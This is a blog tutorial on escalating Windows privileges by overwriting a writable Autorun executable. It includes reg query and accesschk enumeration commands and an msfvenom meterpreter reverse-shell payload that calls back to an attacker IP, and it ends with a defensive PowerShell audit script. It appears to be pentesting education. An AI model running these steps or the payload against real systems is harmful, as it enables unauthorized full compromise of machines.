Windows PrivEsc(4) - Autorun programs

Clement 'Tino
5 min read, Sep 11, 2022


This is the fourth post in the Windows PrivEsc series. You can read the first, which is about Unquoted Service Paths, the second, which is about Hijacking DLLs, and the third, Exploiting Weak Service Permissions.

Prerequisite

Target Machine: Windows 7 (works on all versions of Windows)

Attacker Machine: Kali Linux

Before I begin, I’m assuming we already have a foothold on the Windows target (either a meterpreter session or a cmd shell). We will be using native Windows commands and meterpreter modules to automate some of the process. Let’s begin by learning how to identify and exploit Autorun programs to escalate our privileges.

Here I have a meterpreter shell as a standard user who doesn’t belong to the Administrators group, but by the end we’ll have a new session running as the Administrator.

[Screenshot: standard user]

Exploiting Autorun Programs

Autorun is a Windows feature used to start applications and programs automatically at Windows startup. Autorun is disabled by default on the latest Windows versions such as Windows 10, but Microsoft gives users the ability to enable it.

For our technique to work, Autorun must be enabled on the target. We can elevate our privileges through Autorun by identifying programs that have been configured to run on startup, as well as others that are run by users with administrative privileges.

1. The first step is identifying Autorun applications on the target. This can be done by running the following command in your Windows target’s cmd shell:

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

The output is a list of Autorun applications on the target machine.

[Screenshot: enumerate autorun programs]

2. You can also get this information, plus more, using the accesschk utility. It is part of the Sysinternals suite and can be downloaded here. Upload it to your target with a meterpreter upload, or serve it from the attack machine and use certutil.exe to download it onto the target.

Using a meterpreter upload:

upload Accesschk.exe

3. Now enumerate the permissions on the Autorun program’s directory with the following command:

.\accesschk64.exe -vwu "c:\Program Files\Autorun Program"

[Screenshot: Enumerate Autorun Programs]

-vwu: -v is verbose mode, -w prints only objects that have write access, -u suppresses errors.
-accepteula: add this when you run the tool for the first time; it accepts the tool’s license agreement and is not needed on subsequent runs.

RW means the group has Read and Write permissions and can change the contents of the program directory.

In the screenshot above, we identified an executable, program.exe. This executable runs with NT AUTHORITY\SYSTEM permissions, and we have write access to its directory. All we need to do is replace program.exe with our own generated binary payload. When the Administrator logs on, our payload runs as one of the startup programs and we get an elevated meterpreter shell.

NB: This technique requires the admin to log on to the system for the Autorun program to run.

4. Generate a Windows executable payload with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=<attacker IP> LPORT=6161 -o program.exe

[Screenshot: Generate payload]

NB: The reverse payload should have the same name as the program we are replacing and must be uploaded to that program’s exact path.

5. After generating the payload, we upload it to the program path:

C:\Program Files\Autorun Program

Before uploading, it is advisable to rename the original binary to something else. If our reverse payload doesn’t work, we then have the option of restoring the original as it was.

Rename it (to ‘old_program.exe’) with the command:

mv program.exe old_program.exe

6. Navigate to the program path in your shell and upload the payload:

upload program.exe

[Screenshot: upload the payload]

7. Start a listener and wait for a reverse connection the moment the administrator logs in.

[Screenshot: Start a Listener]

8. The Administrator logs in.

[Screenshot: Wait for Admin to log on]

And a shell is returned:

[Screenshot: you catch a session]

Calling a Windows CMD shell from meterpreter:

[Screenshot: downgrading to cmd shell]

Administrator Profile:

[Screenshot: Admin user profile]

Though Autorun programs can be a great help in making a system more efficient, they should be configured carefully: only administrators should be able to edit the actual executable or the registry key controlling the program’s path, since exploiting this misconfiguration can result in a full system compromise.
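As a defensive counterpart to the manual reg query and accesschk checks in steps 1 to 3, here is an added PowerShell audit script (example code, not part of the original post) that walks the HKLM Run keys, resolves each entry to its executable and reports entries whose binary or parent directory grants write rights to Everyone, Users, Authenticated Users or INTERACTIVE. The group names in $lowPriv are assumed English defaults; localized systems differ.

```powershell
# Added audit script (not from the original post): list HKLM Run/RunOnce entries whose
# executable, or the directory holding it, is writable by low-privilege principals.
# Assumed: $lowPriv holds the (English) group names a standard user is a member of.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Write/Modify/FullControl bits plus GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000), which appear as raw numbers in ACEs set with generic masks.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl' -bor 0x50000000

function Get-ExecutablePath([string]$command) {
    # Expand %VAR%s, then strip arguments: a quoted path ends at the closing quote, an unquoted one at the first ".exe".
    $command = [Environment]::ExpandEnvironmentVariables($command)
    if ($command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($command -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $command.Trim()
}

function Get-LowPrivWriter([string]$path) {
    # First low-privilege identity with an Allow ACE granting write rights, else $null.
    # Deny ACEs are not evaluated, so a hit means "review this", not a confirmed hole.
    if (-not $path -or -not (Test-Path -LiteralPath $path)) { return $null }
    foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights.value__ -band $writeMask) -ne 0) { return $ace.IdentityReference.Value }
    }
    return $null
}

function Find-WritableRunEntry {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($name in $props.PSObject.Properties.Name) {
            if ($name -like 'PS*') { continue }   # skip the registry provider's metadata properties
            $exe = Get-ExecutablePath ([string]$props.$name)
            if (-not $exe) { continue }
            $exeHit = Get-LowPrivWriter $exe
            $dirHit = Get-LowPrivWriter (Split-Path -Path $exe -Parent)
            if ($exeHit -or $dirHit) {
                [pscustomobject]@{ Key = $key; Entry = $name; Path = $exe; ExeWritableBy = $exeHit; DirWritableBy = $dirHit }
            }
        }
    }
}

Find-WritableRunEntry | Format-Table -AutoSize
```

Any row it prints is exactly the condition step 3 looks for with accesschk; fixing it means restricting the directory and binary ACLs to Administrators and SYSTEM.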

I hope you enjoyed this as much as I did. Reach out to me on Twitter @tinopreter, and follow me for more cybersecurity-related content while you’re at it.
